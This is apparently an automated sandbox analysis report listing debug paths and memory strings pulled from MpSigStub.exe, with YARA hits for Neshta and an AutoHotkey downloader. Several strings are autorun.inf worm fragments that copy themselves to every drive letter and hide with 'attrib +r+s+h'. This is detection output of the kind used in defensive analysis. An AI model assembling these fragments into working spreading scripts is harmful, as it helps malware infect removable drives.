Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.2858017646.000000000543F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918507179.00000000030CC000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: CoreMessaging.pdb v source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000005.00000003.2859705734.00000000054F2000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2920656846.000000000613C000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.2862263906.0000000005519000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb] source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: mqutil.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: \Release\kugou.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: mstscax.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb( source: WerFault.exe, 00000005.00000003.2855890772.000000000299F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918220694.00000000030AA000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp
Source:	Binary string: .+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.2858586114.00000000029CB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb( source: WerFault.exe, 00000005.00000003.2856914789.00000000029AA000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918319280.00000000030B5000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb( source: WerFault.exe, 00000005.00000003.2871629055.0000000005FF0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2940537649.0000000006800000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source:	Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: ColorAdapterClient.pdb_ source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.2867958471.000000000605C000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2943062452.000000000686C000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source:	Binary string: wship6.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source:	Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp

Spreading:

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Autohotkey Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Source: MpSigStub.exe, 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp	Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	Binary or memory string: autorun.infx
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	Binary or memory string: [autorun];
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: echo [AutoRun] > %%
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: :\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: \|filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: =fileopen($var[$i]&"\autorun.inf",10)filewrite($
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: ,"[autorun]"&@crlf)
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: p[autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=service.exeshell\open=(&o)shell\open\command=service.exeshell\open\default=1shell\explore=(&x)shell\explore\command=service.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: :\autorun.infopenAutoRun]
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	Binary or memory string: SCPT:AutorunSCPT:Autorun.executeautorun.infSCPT:Autorun.execute.shopenSHELL\OPEN\COMMAND
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	Binary or memory string: nSCPT:Autorun.execute.shexec[autorun]action=open folder to view filesaction=abrir carpeta para ver los archivosshellexecute=icon=%systemroot%\system32\shell32.dll,4useautoplay=1[autorun]
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: in(cdefghijklmnopqrstuvwxyz)doxcopy/h/y/r/kautorun.inf%%
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: f[autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: 1shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: Autorun.inf]
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: autorun.infS
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: S[autorun]
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: E[autorun]
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: G[autorun]
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\explore\command=
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: D:\Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: :\AutoRun.inf
